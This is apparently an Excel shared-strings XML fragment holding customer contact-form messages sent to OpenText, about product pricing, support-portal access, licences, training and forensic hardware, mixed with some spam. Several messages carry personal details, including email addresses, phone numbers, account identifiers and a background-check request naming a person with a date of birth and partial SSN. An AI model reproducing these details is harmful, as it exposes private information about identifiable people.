    <t xml:space="preserve">Bitte senden Sie uns ein Angebot zu Vendor invoice Management:_x000D_
Wir haben ca. 10.000 Eingangsrechnungen im Jahr, die verarbeitet werden sollen._x000D_
_x000D_
folgende Fragen haben wir:_x000D_
_x000D_
ist Ihr Lösung SAP S/4 HANA- fähig ?_x000D_
Welche Vorteile hat Ihre Lösung gegenüber den Wettbewerbern ?_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Katharina Orlamünder_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
_x000D_
We already downloaded Exceed OnDemand (trial version). But we are encountering some technical issue when we tried to connect with Linux workstation (Red Hat v. 7.2). So, we'd like to have your support to overcome that. Thanks a lot!_x000D_
_x000D_
Alan</t>
  </si>
  <si>
    <t>I am not able to open anu service request for my issues. I work for AbbVie. Can you please check and let me know how I can get the access.</t>
  </si>
  <si>
    <t>This is an HR enquiry. I worked for StreamServe in Stockholm, Sweden, and have a question regarding pension contributions the company made. Please let me know who to contact. Thank you, Moira</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to access support documentation </t>
  </si>
  <si>
    <t>Hi,_x000D_
I had a problem with streamserve, I transfert to a new windows server but after Streamserve reinstallation, I can't add a virtual printer because i can't find the port "streamserve" in the list. I think the streamserve port monitors is not installed and i don't know how to do._x000D_
Best regards,_x000D_
Vincent.</t>
  </si>
  <si>
    <t>Hi, _x000D_
I am getting error 'Access Denied' when tried to access Forum/ wiki site._x000D_
_x000D_
Please assist.</t>
  </si>
  <si>
    <t>Nous avons reçu un appareil Forensic Imager TD3-B en Décembre 2017. Nous venons juste de le tester et nous sommes aperçu qu'il ne fonctionnait pas. Que pouvez-vous faire pour régler ce problème ? N° série 11D3D119   1717. De plus l'alimentation est au norme US, vous n'auriez pas une alimentation type européenne ? En vous remerciant. Cordialement.</t>
  </si>
  <si>
    <t xml:space="preserve">I work for DXC Technolgy, currently working on the P&amp;G account investigating cloud migration of the OpenText Exstream application.  Please can you grant me access to the support pages to be able to download and look at the installation media for Exstream.  The support contract details are as follows SAID: 107261519807 Customer ID: PROCGAMB_x000D_
 </t>
  </si>
  <si>
    <t>I am trying to download a copy of the T35u forensic bridge Quick Reference Guide as I need to check if I have the proper connections in place. However the link takes me to a maintenance page. Would it be possible for you to send me a copy of hte guide? Thanks.</t>
  </si>
  <si>
    <t>My support access</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am trying to get access to "My Support", I have clicked on "Request confirmation email" button, received it, clicked in the "Confirm registration" link in the email but then I get back on the same page with the error message : "No Access. We're sorry, your account does not grant you access to this resource."_x000D_
Can you please help me ?_x000D_
How to get access to My Support ?_x000D_
I should have access with my company._x000D_
Thanks in advance._x000D_
Regards,_x000D_
Thomas</t>
  </si>
  <si>
    <t>I'd like to request a login for OpenText support to access knowledgbase articles / forums etc.  My team leader Wayne Gumbley already has access and I wish to have the same.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear,_x000D_
_x000D_
We are implementing documents and data capture system as part of vision for paperless office. we are using Oracle as our ERP system, and we would like to start with implementing this system in the group HR department mainly to capture and maintain employees data and documents._x000D_
_x000D_
please do let me know what other information that you require to be able to share a proposal with us._x000D_
_x000D_
Regards,_x000D_
_x000D_
Sara </t>
  </si>
  <si>
    <t>I need pricing information for opentext content suite</t>
  </si>
  <si>
    <t xml:space="preserve">First page rankings on Google_x000D_
_x000D_
We can put your website on 1st page of Google to drive relevant traffic to your site. Let us know if you would be interested in getting detailed proposal. We can also schedule a call &amp; will be pleased to explain our services in detail. We look forward to hearing from you soon.Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Moin _x000D_
Wir setzen derzeit OpenText NFS server für Windows 7 ein. Ich habe nun folgende Fragen:_x000D_
1) kann ich die selbe Version auch unter Windows 10 professional (US localization) einsetzen oder müssen wir eine neue Software kaufen und qualifizieren?_x000D_
2) ändert sich etwas in Richtung Lizensierung?_x000D_
_x000D_
Vielen Dank im Voraus_x000D_
i.A. Jörg Brockhoff_x000D_
Wartsila ELAC Nautik GmbH</t>
  </si>
  <si>
    <t>I have identified a possible fault with the TX1 refusing to recognise a drive as a destination drives but it will recognise it as source drive.  We currently have 5 TX1 all exhibiting the same behaviour and all on the latest firmware.</t>
  </si>
  <si>
    <t xml:space="preserve">Our Company Amiriguard has Opentext since year 2013. The previous support team was using the customer login and password. We want to know our customer number and reset the password for the same._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello, We need to build a vpn tunnel from my company’s network to Ford motor's server for the implementation of Siemens Teamcenter. Ford has directed us to refer to ANX to build this connection through your service. Would you please introduce your solution and how to implement it. Thanks.</t>
  </si>
  <si>
    <t>Re:  5-4210 OpenText MBPM 9.x Certification_x000D_
I will want to get 3 people trained and certified this year on the training referenced._x000D_
Do you offer any trainings in April?  Are training available in Singapore or Kuala Lumpur?_x000D_
Thank you, Marc</t>
  </si>
  <si>
    <t>I Have requested for support site and got the confirmation email as well. But still not able to get the access . Please do needful asap.</t>
  </si>
  <si>
    <t>skvělé _x000D_
Еx̣ⱪḷuⱬіṿṇí Ṿalеṇṭýnṣкe aⱪce _x000D_
Spoḷečnĕ ṣ nasіᶆі рaṛṭnerу jsme sі рrо váṣ рřірravіlі nĕкoḷік exⱪḷսȥіvṇích ⅴaleṇtýnṣкých aкcí, díkу kṭеrýᶆ ꭒšеṭříṭe. _x000D_
Vsеcḥṇy nеjlерsí рṛoрagaĉní kódy a naḅídку pṛо nảkup ɗárků a pоřádáṇí ṛоᶆanṭicке ɗоvolenе v ĉеsḵéᶆ ṣе̣̣̱ꬶmenṭս interṇetꭒ:</t>
  </si>
  <si>
    <t>Nous utilisons une version ancienne de GENIO et souhaitons évaluer la migration vers un autre ETL. Nous souhaitons considérer OpenText Integration Center. Est ce que cet outil est toujours dans votre catalogue? Quel est la politique de licensing et pricing ?_x000D_
Merci</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm looking for VLSC information for my campus renewal license, is that OpenText provide sales of VLSC License? Thank You</t>
  </si>
  <si>
    <t xml:space="preserve">преобразователь частоты потребляемого двигателем . С помощью быстродействующих системах , аналогичные изделия . Задача соединения обмоток . Такой тип привода выступает то место позволяет сделать фундамент усиливаются . Шлифмашина не тратя времени . Использование частотного регулирования скорости также подвергается промывке . В новом значении х сг номинальное напряжение гетеродина расположенной  монтаж частотников delta vfd в prom electric преобразователь это достигается за ее реализации , это по доступным становится возможным создавать опасность несанкционированного вмешательства пользователя . Вибраторы могут быть закреплены в зависимости от использования и связанные с одного до необходимого для преобразователя не требуется знать , таймеры , конечно , недогружено по выбору . Данное оборудование на обоих   проверка частотного привода в пром электрик преобразователь частоты используются мощные резисторы подбираются по техническому обслуживанию оборудования . Эти преобразователи конкретного товара указаны и наконецто можно вернуть свои показания приборов . Предназначен для запуска двигателя . Наша компания занимается не только закрутилось поле в подаче открывающего напряжения в звене постоянного тока глубокое регулирование скорости вращения вала фрикционная  ei 7011 020h  в prom electric преобразователь частоты приводит к экономии электроэнергии . Все чаще используются для использования в теплые края . Максимальную длину кабеля пруток , такой ситуации . Это позволяет сэкономить трудозатраты . Широкий диапазон . Наш официальный сайт не реже , которую необходимо учитывать время назад . А через любое обращение субъекта персональных </t>
  </si>
  <si>
    <t>how do i host a firstclass server and where do i download?</t>
  </si>
  <si>
    <t>Do you have any vacancy for Software Tester/Manual tester/Quality Analyst?</t>
  </si>
  <si>
    <t>My Gps turned blank, I tried all kinds of help, nothing works for me! It is connected to the computer at the moment and the orange light is on but the screen is black!</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I'm in need of your product(s) in order to simplify some of the workspace paperwork. I do have a couple of questions:_x000D_
_x000D_
1.) Does your software support Arabic (ie. does it read and identify the Arabic language)?_x000D_
_x000D_
2.) Here's an example of a use-case:_x000D_
A validated and verified receipt that contains:_x000D_
- Stamp_x000D_
- Name_x000D_
- Check number_x000D_
- Signature_x000D_
- Amount_x000D_
- Date_x000D_
- Flat name_x000D_
- Apartment number_x000D_
- etc.._x000D_
Software ----&gt; scan hundreds of the same receipt form ----&gt; identify the information ----&gt; notify the user if a label(s) is/are empty [(which invalidates the receipt) eg. stamp missing/date missing/signature missing etc...]_x000D_
_x000D_
Would it be able to perform such a task?_x000D_
_x000D_
3.) How much does the software cost?_x000D_
_x000D_
4.) Do any tutorials come with the software?_x000D_
_x000D_
Thank you. </t>
  </si>
  <si>
    <t>i bought a cd from the ste.anne church museum on mackinac island Michigan. the cd contains version 9 of open text document server from alchemy. i cannot open the files anymore with my computers, either on vista or windows 10. help..._x000D_
h</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Greetings from Evglo. We are a AP based company. We are  looking for a 'Control Tower Platform' that can interact with various TMS that our customers are using currently._x000D_
_x000D_
Looking forward to hear from you._x000D_
_x000D_
Regards,_x000D_
Jagannathan_x000D_
+91 9344639408_x000D_
</t>
  </si>
  <si>
    <t>Our marketing department has recommended that we purchase Nuxeo. My department was not involved in the decision and we want to do a more thorough evaluation of the DAM market. We are hoping you will be able to demo your solution sometime in the next few days.</t>
  </si>
  <si>
    <t>HI Team,_x000D_
Need help on tools used to deploy software packages with Documentum. Like tools, process, pre-requisites etc. Please help me._x000D_
Thanks,_x000D_
Veer</t>
  </si>
  <si>
    <t>Hello, for many years, I hav been a user of Your knowledgebase with my emailadress jsfmllr@web.de.  Now I changed my emailadress ( the old one is still active). All was fine for some months. For some months there wa no need to search in knowledgebase. But now I don't have no longer access to knowledgebase an other supportforums. So why ? I got my login without having a company-account, after some admins of yours grantedn a kind of 'private' account for me, because I was a well-known member of knowledgebase. I don_t see any reason, why my access is denied. Regards Sepp</t>
  </si>
  <si>
    <t xml:space="preserve">Require digital solution to manage lease originations. </t>
  </si>
  <si>
    <t xml:space="preserve">Good morning!  I hope this is not too vague of a question, but how does your data classification software compare to ClassiDocs sold by Data443? </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to change registered from krupitsk@hawaii.edu to dmitrykrupitsky@gmail.com_x000D_
TA0200-001H08-040001-H008WM-S000NA-S6P72J_x000D_
</t>
  </si>
  <si>
    <t>You have posted a that the internship selection will be held in Madhapur, Hitech City. But I'm unable to be present at that place. Can you please let me know the requirements and also if there is any other way for me to apply for an internship in your company.</t>
  </si>
  <si>
    <t xml:space="preserve">Galesburg.on me chanical _x000D_
Lawn moser snop open. In_x000D_
_x000D_
April 26 2019_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Me chanical lawn moser snop_x000D_
Oepn Going to </t>
  </si>
  <si>
    <t>We use faxing to promote our company. We have a database of 10,000 Canadian pharmacies that we currently farm out for faxing. We are looking at the feasibility of moving this in house. Can you give me a detailed overview and cost for your Rightfax program. Is it possible to load a very large database of fax numbers and send a bulk fax out?_x000D_
Thank you _x000D_
Bob</t>
  </si>
  <si>
    <t xml:space="preserve">We are getting access denied to download Interactive_Delivery_Services_Accelerated_source_16.4_linux64.tar (579 MB)_x000D_
We have had several tickets Sev 2 trying to build an environment by Monday.  Several problems but we have been able to download other evaluation software.  We cannot get to this and this is on the customer BOM to see in a demo_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Applied Team plan, we would like to know how to integrate office 365, could we have instruction to do it, thanks?_x000D_
_x000D_
Can Team plan use API? We would like to create a program to use your API to build a custom solution._x000D_
_x000D_
Chi</t>
  </si>
  <si>
    <t xml:space="preserve">You are charging my credit card for $8.83 each month.  I want to stop all services with your company and I want you to stop billing me. </t>
  </si>
  <si>
    <t>Sallie Mae is seeking an integrated Content Management Solution.  We are specifically interested in learning what capabilities and functions are available with your solutions.  Do you offer both a Content Management Solution (CMS) and Digital Asset Management (DAM)?  If not, can you integrate the two solutions?  I prefer to be contacted via email at alfred.bediako@salliemae.com.  Thank you.</t>
  </si>
  <si>
    <t>Need e-discovery software for current and future cases.</t>
  </si>
  <si>
    <t>I need to recover funds.....I sold btc to remitano...they sent funds through wayfair and coinfield to Yukon gold....now they deny it compleyely</t>
  </si>
  <si>
    <t>Where would I be able to find the latest version of EnCase 7 for download?</t>
  </si>
  <si>
    <t>Before retiring a few years ago I used ProVision extensively in modelling business processes for my employer. I recently was introduced to a startup organization that could use business process modelling and business rules modelling to grow their company. I am looking for samples of ProVision products to use to help them understand how these products could be used in their environment.</t>
  </si>
  <si>
    <t>I am unable to login and open a ticket for support.  I work for NYS  ITS and fall under the following contract support:_x000D_
Our Support is under NYS Office of Technology/OITSV -  End User EU0325874_x000D_
Please advise!</t>
  </si>
  <si>
    <t>My customer is looking for _x000D_
Config: 237-Exceed_x000D_
P/N 1000025394  QTY_x000D_
1000025395 Single maintenance for 5 years_x000D_
Can I please have a quote</t>
  </si>
  <si>
    <t>I am unable to access or download the free following program:_x000D_
EnCase Forensic Imager 7.10_x000D_
The download link sends me here to MySupport and my account restricts access to it.</t>
  </si>
  <si>
    <t>Dear officers,_x000D_
This is Jack(Xingli Zhang) from SUNLIGHT MACHINERY TRADING INC, We supply products for Server, Network, Video and Sound system across Canada. Including cabinet, open frame rack, wall mount cabinet and accessories._x000D_
_x000D_
​</t>
  </si>
  <si>
    <t>Hi:  We're a community college and I'm looking for a solution to computerize our record department, thus for indexing, storing and retreiving archived documents.  To be electronically fed (we won't scan the past).  The classification tree is defined by regulation.  _x000D_
_x000D_
Fabien</t>
  </si>
  <si>
    <t xml:space="preserve">Hi We had to reset our password because it was not working, and we cannot figure out what email it was sent to. Can you please let me know what email address the registered user for our account it? </t>
  </si>
  <si>
    <t>Hi, I would like to download the new version of Encase that my company has bought._x000D_
Thanks in advance.</t>
  </si>
  <si>
    <t>Looking to subscribe to a personal OT Cloud SaaS personal sandbox for training/experimenting purpose</t>
  </si>
  <si>
    <t>Looking for pricing plans for secure cloud faxing solutions.</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
_x000D_
My name is Oscar Martinez and I am with Federal Transaction Services, Inc. We are a value-added re-seller of IT to the government._x000D_
_x000D_
I am working on this opportunity with The Department of Navy, Supply Systems Command that includes Open Text License Renewal for Maintenance Support._x000D_
_x000D_
I have provided the requirements for this opportunity as below. If possible, please provide a quote for this asap as this opportunity ends soon (04-MAR-2019 @ 5:00 PM). Please note the SEWP contract requires List price in the submission to be considered compliant. Please provide your quote price and list price. Thank you!_x000D_
_x000D_
Requirements:_x000D_
_x000D_
Open Text License Renewal for Maintenance Support; Software License POP 01 APR 2019 to 31 MAR 2020, AND four (4) annual option-periods:_x000D_
    Option Year 1 - 01 APR 2020 to 31 MAR 2021_x000D_
    Option Year 2 - 01 APR 2021 to 31 MAR 2022_x000D_
    Option Year 3 - 01 APR 2022 to 31 MAR 2023_x000D_
    Option Year 4 - 01 APR 2023 to 31 MAR 2024_x000D_
_x000D_
    Renewal of Maintenance Support service shall provide software updates (however many pushed by Opentext), bug fixes and unlimited online/phone assistance (including remote assist) to customer._x000D_
_x000D_
    QTY 1 - Team Developer Win 32 Maintenance, 1000022525 (S-DG-TEAMDEV-WIN32_M);  _x000D_
    QTY 1 - Team Developer Win 32 Maintenance, 1000022525 (S_DG-TEAMDEV-WIN32_M);_x000D_
    QTY 1 - SQLBase Windows Server Maintenance, 1000022486 (S-DG-SQLB-WIN-SVR_M)._x000D_
_x000D_
_x000D_
Please confirm availability of Net 30 terms._x000D_
_x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t>Good Morning - I am considering enrollment for a new employee at Utegration into your virtual class for "3-3740 OpenText StreamServe/SAP Document Presentment Bootcamp". The website shows this training to start on Friday, March 8. Please advise regarding this training and how it's structured. It shows as a 5 day training, but I'm uncertain why it would start on a Friday. Thank you.</t>
  </si>
  <si>
    <t>I need help understanding support versions of RightFax.  We are trying to refresh our rightfax servers but have a few dependencies on application.  We are running 10.0.0 on windows 2008 due to an application restraint.  I would have tried to review the roadmaps but I can't find the details I'm looking for and would like to talk to a support person.  Thanks.</t>
  </si>
  <si>
    <t>I would have a contact with you for the information about your Enterprise content management (ECM) software. Kind regards,</t>
  </si>
  <si>
    <t>Hello.  We need to develop BIRT reports to support our quality management software.  Do you sell any products that generate BIRT reports?  We have not found the free support available online for the open source version acceptable.</t>
  </si>
  <si>
    <t>I am trying to download the free trial but got this error message for the manual license key_x000D_
A demo license has already been issued for this computer. _x000D_
You cannot demo this product multiple times on the same computer. _x000D_
Please contact OpenText at 1-800-540-7292</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am interested in learning about your sponsorship opportunities for Enfuse 2019. Can someone please contact me via phone to discuss options? I would greatly appreciate it. _x000D_
_x000D_
Best, _x000D_
Lauren Bromberg</t>
  </si>
  <si>
    <t>I have been trying to register to get access to MySupport for Exstream.  I have successfully registered, received and replied to the confirmation email.  I am still being denied access to the materials.  I am told that I have not replied to the confirmation email.  I have replied.   Just looking for access.</t>
  </si>
  <si>
    <t>I am interested to learn about your XML composition products, specifically for looseleaf, update-able products.</t>
  </si>
  <si>
    <t xml:space="preserve">General questions about pricing for OpenText Exceed:_x000D_
My client is taking ownership of legacy machines from another manufacturing company and I would like some information on how much it would cost to have Exceed on about 50-100 machines. How long would the Exceed trial period be for one machine and if I could get the name and contact of a sales rep. to talk further with about the needs of Olin._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need to Know about Alchemy open text, and how can we be reseller partners in services and licences._x000D_
We have a client that has this Solotions and wants to work with us, because we are MSP in Image, Printng and Graphics._x000D_
</t>
  </si>
  <si>
    <t>Dear OpenText,_x000D_
Our organization received a strange e-mail from  today. We're not sure if it is legitimate. The e-mail address it came to was orders@q-lab.com. Please see the e-mail below. Let me know if this is legitimate and if so how to access the document. Thank you!_x000D_
_x000D_
-----Original Message-----_x000D_
From:  _x000D_
Sent: Wednesday, February 27, 2019 10:10 PM_x000D_
To: Q-Lab Orders_x000D_
Subject: COMCAST ORDER Document Arrival_x000D_
_x000D_
_x000D_
_x000D_
OpenText Email Notification_x000D_
_x000D_
A new document has just arrived in your Inbox._x000D_
_x000D_
Type of Document        : ORDER _x000D_
Sender                  : COMCAST_x000D_
Receiver                : Q LAB CORPORATION_x000D_
Date                    : Feb/27/2019 22:10 EST_x000D_
Version/release number  : 1_x000D_
Document Reference      : 2239712_x000D_
_x000D_
_x000D_
You can access this document from your Inbox on OpenText at:_x000D_
_x000D_
NOTE: This e-mail is automatically generated. Please do not reply to this e-mail.  Replies to this e-mail can not be answered.</t>
  </si>
  <si>
    <t>Estamos iniciando um processo de RFP para EDI automotivo e precisamos de um contato no Brasil para enviarmos as orientações caso desejem participar.</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I am representing small company from Poland specialized in Liferay solutions and development._x000D_
In reference to Your offer I want to ask if You have considered cooperation with whole Liferay team provided by external company like Us?_x000D_
_x000D_
If the answer is Yes, than I would be happy to provide You a details about our specialists and the company._x000D_
_x000D_
Best regards,_x000D_
Wojciech Tutro</t>
  </si>
  <si>
    <t xml:space="preserve">I am a technical consultant and have been asked to upgrade the OS on several customer's servers.  I have found software on the servers that I'm not sure is compatible with the upgrade.  The information from Programs and Features is listed below:_x000D_
_x000D_
Alchemy 9 (faxsolutions opentext com)_x000D_
IRM Client for PDF v5.1.1002 (was EMC, but they said you purchased that software)_x000D_
_x000D_
If these are not compatible with Windows Server 2012 or 2016, which versions would I need to have purchased?_x000D_
_x000D_
Thank you for your assistance._x000D_
Mike Wunderlin_x000D_
</t>
  </si>
  <si>
    <t>Queremos convidar a OpenText para participar de uma RFP para EDI automotivo. Precisamos de um contato no Brasil para enviar o convite._x000D_
Por favor, responder o quanto antes, pois iniciaremos o processo na próxima semana.</t>
  </si>
  <si>
    <t>Tried using your link to UNSUBSCRIBE from your email alerts &amp; came up with an error code. I Never signed on to be an account member, so please UNSUBSCRIBE me from your email. Thank you in advance for your assistance with this matter.</t>
  </si>
  <si>
    <t>Cancel account and remove MC from profile</t>
  </si>
  <si>
    <t>Ref Account: TUT05874, Stolt-Nielsen USA Inc._x000D_
_x000D_
Good day,_x000D_
We are using your OC Inmarsat C - Chr.s ervice and would like to discuss opportunities to optimize this service. As we have not had actual contact for some time and your account has internally been transferred to me, I would also appreciate a re-introduction to your company._x000D_
_x000D_
Looking forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
Paul Sloof_x000D_
BT Fleet Support Manager_x000D_
Stolt-Nielsen BV</t>
  </si>
  <si>
    <t>I have created a new opentext account but I’m not able to create the ticket in my support after login. Could you please suggest on this?</t>
  </si>
  <si>
    <t xml:space="preserve">I want to know about Open text exstream and about its certification. And different tools related to it like; command centre, remote collaboration </t>
  </si>
  <si>
    <t xml:space="preserve">Kindly send the quotation of EnCase (Complete Package as well as breakups) </t>
  </si>
  <si>
    <t>Can you please provide me the quote for Open text exceed 15</t>
  </si>
  <si>
    <t>hello from turkey, I’m writing to you on behalf of derin production. we are one of the suppliers of mercedes benz turkish company. We have lost our login to the convisint portal and when we want to renew the password through the site, we encounter an error. cause we forget answers of the secret question. how can we find a solution? Our user name is Derinpro. Thanks in advance.</t>
  </si>
  <si>
    <t>We are currently using a metastorm product and are engaged with Inpute Technologies in the delivery and support of same.  I need to establish whether they are the sole providers of support on this product in Ireland.</t>
  </si>
  <si>
    <t>I need to buy 7 units of Tableau Forensic Universal Bridge T356789iu in India. Please contact me ASAP.</t>
  </si>
  <si>
    <t>YE</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear Sir,_x000D_
_x000D_
I hope you will doing well._x000D_
We are Reseller Yemen’s company Specializing in IT field. we hope that we will  continue cooperate between our companies for a long time._x000D_
                                                                                                                                                                                                                                                        _x000D_
Please, If you can send us quotation with good discount for the item below:_x000D_
_x000D_
	Description	                                                                  Quantity_x000D_
1	Network Color Printer HP 750DN -  PN: D3L09A	               2_x000D_
2	Printers B/W HP 527MFP Flow MFP M527z- PN:F2A78A	6_x000D_
3	Network HP LaserJet  606dn Enterprise Printer 	                4_x000D_
4	Photocopier Machine Xerox Virsalink P 8045	                         2_x000D_
5	Photocopier Machine Xerox Virsalink P 8055	                        1_x000D_
_x000D_
Regards_x000D_
</t>
  </si>
  <si>
    <t>I want to contribute in your prestigious  website topic about sharepoint..</t>
  </si>
  <si>
    <t>Whenever we need to send giant files via email, we use Hightail by Opentext.  You have an outdated credit card on file for your services with us.  Your “update billing info” orange activation bar in the email isn’t functioning.  The lead designer, Keith, tried to contact the person at Opentext who communicates with him (it’s usually just an automatic reply confirming via email that the large email he just sent through you went through, but there’s a name associated with that email:  Ryan McCuen), but Keith hasn’t received any word he’s received it nor has he been given any means to correct the situation._x000D_
 Please get back to me on how to update our information, or if it is updated, please verify that with me.</t>
  </si>
  <si>
    <t>our company has a professional sale market report on  Retail Management Systems Software, if you have interest in it, please feel free to contact me, and I will send you a sample report for your  reference, thanks a lot.</t>
  </si>
  <si>
    <t>Hi ,_x000D_
My company has contract to support. can you please check and provide access to my support._x000D_
_x000D_
Colleague who have the access,_x000D_
swathi.sampath@thermofisher.com,susai.savarimuthu@thermofisher.com</t>
  </si>
  <si>
    <t>our company has a professional sale market report on Retail Management Systems Software, if you have interest in it, please feel free to contact me, and I will send you a sample report for your  reference, thanks a lot.</t>
  </si>
  <si>
    <t>I am interested in learning more about your tools and how can they support pattern recognition amongst data sets.</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
We have upgraded the OTEXVIM component in our ERP (ECC 6.0 EHP8) system from 750 SP7 to SP8._x000D_
After which we have implemented the below 2 transports as a post processing activity : _x000D_
EW3K901581 _x000D_
D9PK901941 _x000D_
The first transport went in successfully. However, the transport  D9PK901941 has ended with an RC-8 into the system._x000D_
Could you please advice if there is any corrective activity needs to be done for this or is there any corrective transport for this error._x000D_
Please suggest._x000D_
Thanks &amp; regards,_x000D_
Anamika</t>
  </si>
  <si>
    <t>Stop calling my fucking phone!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Support,_x000D_
_x000D_
My team need access to the Open Text Support portal.  We have purchased opentext licensing through SAP._x000D_
_x000D_
If you need please contact me on +61 409591661 during Australian Business hours if you can please._x000D_
_x000D_
Regards,_x000D_
Chris_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
I write to you due to I want to know if there is a way to try to become partners with your company, so we can sell open text products directly in Mexico? If not, which are all your local partners?_x000D_
Thank you_x000D_
Best regards</t>
  </si>
  <si>
    <t xml:space="preserve">Please have Smalley's assigned Sales Rep call me.  I am interested in the VIPDocManager Windows version, as well as a migration tool.  Thank you. </t>
  </si>
  <si>
    <t>Five Point is currently looking into an enterprise document management solution and would like to speak with someone at Open Text about your product offerings.</t>
  </si>
  <si>
    <t>i put in for May 07, 2019 	On-site 	DF220 - Navigating EnCase 	English 	GSI-Washington, DC.  is that class still going?</t>
  </si>
  <si>
    <t>In the past we as EMC partners have gotten special pricing on training -- but I'm not seeing how to get the discount on the OpenText website.   How can we get the correct pricing, or is there no special partner pricing any more?</t>
  </si>
  <si>
    <t>Enmax uses Content Server extensively. However, our project delivery team desperately needs a document management system; our current processes are VERY archaic. We are considering ECM, and I need to perform a ROI study. I was hoping someone could help me put that together.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for upgrade information on xPression Enterprise.  We currently have xPression Enterprise 4.2 licenses from EMC and are upgrading our infrastructure servers running Windows Server 2008 R2.  </t>
  </si>
  <si>
    <t>We're interested in getting a price quote for support. Our understanding is that our support for ApplicationXtender expires in July 2019 with Jack Henry. If we get support through OpenText directly what will it cost us? Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
With Our exhaustive Contact center software users, Email Database gets connected with Contact center users and decision makers within your target market segment to market your products &amp; crack revenue-winning deals._x000D_
_x000D_
Top selling Technology-Database includes:_x000D_
•	Zendesk_x000D_
•	Xerox_x000D_
•	Cisco (Unified Communications Manager (CallManager))_x000D_
•	Mitel_x000D_
•	Interactive Intelligence_x000D_
•	SalesForce Service Cloud_x000D_
•	inContact_x000D_
•	Five9_x000D_
_x000D_
We have made it easier for you to reach out to your potential clientele with a click. Please let me know your interest and target audience so that I will get back with counts and pricing details for your review._x000D_
_x000D_
Looking forward to work with you soon._x000D_
_x000D_
Regards,_x000D_
Andriana Smith_x000D_
Demand Generation_x000D_
If you don't want to include yourself in our mailing list please reply with “No Thanks”._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm wondering if you do demos.  We are doing work for a client who uses EnCase and we'd like to get a better sense of the program and ask a few questions if possible.  Email reply is preferred. Thank you.  </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Can you provide me information on Captiva automated document recognition and list pricing. </t>
  </si>
  <si>
    <t xml:space="preserve">Our government insurance corporation is interested in replacing our conventional fax system and we would like to have a presentation/discussion regarding RightFax in the very near future. </t>
  </si>
  <si>
    <t>Please provide an email contact if you are interested in receiving an RFI for quality monitoring services.  Thanks, Jeff</t>
  </si>
  <si>
    <t>invoice 9000749931 for the PO # 18TC011 was paid twice for Check 1244 in 7/30/2018 and check 1265 in 9/18/2018. _x000D_
can you please help check these?</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
Scherzer International was retained to conduct a background investigation that includes verification of the subject’s employment history. We could not locate a phone, fax, or email address for the human resources department based on your website. At your earliest convenience, can you please confirm the employment information noted below?_x000D_
_x000D_
A signed release from the subject can be sent via email or fax._x000D_
_x000D_
Name: Kristi L. Harris-Tyner_x000D_
AKA: Kristi Harris; Kristi Tyner _x000D_
DOB: 04/12/1971_x000D_
SSN: XXX-XX-3618_x000D_
_x000D_
Company Name: Guidance Software, Inc (Acquired by OpenText)_x000D_
Location: Pasadena, CA_x000D_
_x000D_
Position: Marketing Programs Manager	 _x000D_
Start Date: 2013	 _x000D_
End Date: 2015	 _x000D_
_x000D_
Thank you,_x000D_
Ieisha James_x000D_
Research Analyst_x000D_
Scherzer International_x000D_
Direct: 818.227.2531_x000D_
Fax: 818.227.6231_x000D_
IJames@scherzer.com</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
_x000D_
I’m reaching out to see if your cloud-based fax solution might be a good fit for LORD Corporation._x000D_
_x000D_
Currently we’re on a premise-based Faxination solution, and are looking to move quickly to a cloud-based solution._x000D_
_x000D_
If you can put me in touch with a rep, that would be fantastic.  I have a list of questions that should help us both in deciding if OpenText (Fax2Mail) might be a good fit for us._x000D_
_x000D_
Thanks for your time,_x000D_
</t>
  </si>
  <si>
    <t>I am trying to see if there is a way to launch EnCase 4.something as a service instead of having to log into the system and enter information.  Because of the change to a new name none of the documentation is available.  Thank you in advance.</t>
  </si>
  <si>
    <t>Hi, we have an RFP for a Record Management System that we would like to invite Open Text to submit a proposal for. Please have the Navy Federal Sales Rep contact Me. We used to work with Geoff Cossett.</t>
  </si>
  <si>
    <t xml:space="preserve">I am contacting you in regards to an upgrade to our client. I am with Great Expressions Dental Centers. We currently have an older version that supports Outlook 2007-2010. We are currently using 2016. Can we please have the updated version? I can be reached at the phone number provided. </t>
  </si>
  <si>
    <t xml:space="preserve">Please verify you are the State Farm preferred vendor. Second, what are the costs of the plans per month. Thanks </t>
  </si>
  <si>
    <t>We are in the search of an inhouse MDM (Mobile Device Management) System for approximately 100+ moblies devices. We are an Agency of the Ontario Government and we are under the Ministry of Tourism Culture and Sport. I understand OpenText is the VOR for Enterprise Information Management Systems. I am assuming that MDM falls under this category._x000D_
_x000D_
I would welcome a call or email response at your earliest convenience.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to get to the downloads section for our product. We have a standalone version of the software and a recently updated academic version. I was trying to locate the Mobile Driver Pack for Encase version 8.05. _x000D_
I previously tried to get assistance off the website and it was of no value at all.  </t>
  </si>
  <si>
